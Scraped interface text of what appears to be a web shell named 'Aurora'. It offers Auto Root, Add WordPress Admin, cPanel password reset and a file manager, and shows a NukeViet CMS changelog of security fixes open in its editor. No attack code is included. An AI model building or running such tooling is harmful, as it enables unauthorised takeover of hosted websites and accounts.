Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
var
softaculous
nukeviet
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: changelog.txt
NUKEVIET 4.6.02 - Fix reflected XSS via double URL decoding of search keyword in news module (CVE-2026-94599). Thanks Thế from GitHub @Pbat6 - DOMPurify v3.4.15 - Fix stored XSS via internal marker injection in iframe srcdoc (CVE-2026-94598). Thanks Thế from GitHub @Pbat6 - Fix RCE via image upload bypass chain (CVE-2026-94597). Thanks CAN QUANG HIEU from GitHub @canhieu - Fix a security vulnerability in the SVG file upload (CVE-2026-94567). Thanks Nguyễn Huy Hoàng from GitHub @hoanggxyuuki - Fix SSRF vulnerabilities in the upload functions, the Image class, and sitemap ping. Thanks canhieu from GitHub @canhieu. - Fix dangerous functions accessible via the GET method. Thanks archnexus707 from GitHub @archnexus707 - Fix a security vulnerability in the module language write functionality. Thanks phuongmai1212 from GitHub @phuongmai1212 and AuQuangDuc from GitHub NUKEVIET 4.6.01 - Fix XSS in class Request. Thanks mrlihd from GitHub @mrlihd - Select2 v4.1.0, DOMPurify v3.4.13. - guzzlehttp/guzzle v7.15.2 - Fix numeric-entity leading-zero bypass in Request XSS sanitizer. Thanks Mai Đăng Khoa from GitHub @dkoazw - Restrict users custom field callback to prevent RCE. Thanks Nguyễn Hồng Giáp from GitHub @PinkArmor - Fix pre-auth SSRF via spoofed Host header in set_ini_file server info request. Thanks prat1kz from GitHub @prat1kz - Fix arbitrary file write via S/MIME certificate CN in SMTP settings. Thanks Jace from GitHub @manus-use - Fix a permission issue when changing comment status - Prevent SSRF DNS rebinding in Files\Upload URL import NUKEVIET 4.6.00 - Fixed an issue where figure tags were removed from tables in the editor. - Updated the password hashing and cookie encryption mechanisms - Use CSPRNG (random_int) for TOTP and nv_genpass security tokens - Fix second-order SQL injection in users sql_choices custom field - Harden deserialization and TLS verification across the system - Fixed issues related to HTML popovers - Fix PHP code injection in robots.php via unfiltered filename keys - Update guzzlehttp/guzzle 7.12.1, guzzlehttp/psr7 2.12.1 - Refactor nv_check_dump_path function to enhance file extension validation and improve directory checks - Fixed an issue where some valid uploaded images were incorrectly blocked - Require PHP >=7.4.00 NUKEVIET 4.5.08 - Remove abandoned package true/punycode - Remove the and/oauth package, which has long been unmaintained, and replace it with league/oauth2-client - Remove SDK of social network like/share button tools and replace with pure HTML/JS - Fix XSS bug. Thanks Nguyễn Quang Bằng from WhiteHub#4394 - Support PHP 8.5 - Add a strict permission-checking mode for uploading application packages #3910 - Prevent CKEditor 5 UI buttons from triggering parent form submission #3916 - Fix CSS content conflicts between CKEditor 4 and CKEditor 5 - Fix voting popup - Ckeditor 5 v47.6.2 - Jquery UI v1.14.2 - DOMPurify 2.5.9 and 3.4.0 NUKEVIET 4.5.07 - CKEditor 5 v47.0.0 and remove CKEditor 4 - PDF.js 3.11.174 - Fix warning error in nv_is_image function when checking webp files - Fix download database backup files during upgrade - Add feature to force re-login when editing account in admin area - Adjust the explanation for the "Developer Mode" - Fix the error in viewing attachments in the module news - Add custom block position feature - Add http_response_code before trigger_error - Fix banner module error when installing a new language - Improved source display in the admin panel of the news module - Improve the configuration for inserting logos into images - Fix the error in counting article views - Improved article review workflow in the news module - Fix password reset issue when using Recaptcha 3 - Enhance the permission system for the Zalo module - Jquery UI 1.14.1 - Update the versions of Composer libraries - DOMPurify 3.2.7 and 2.5.7 - Remove function searchKeywordforSQL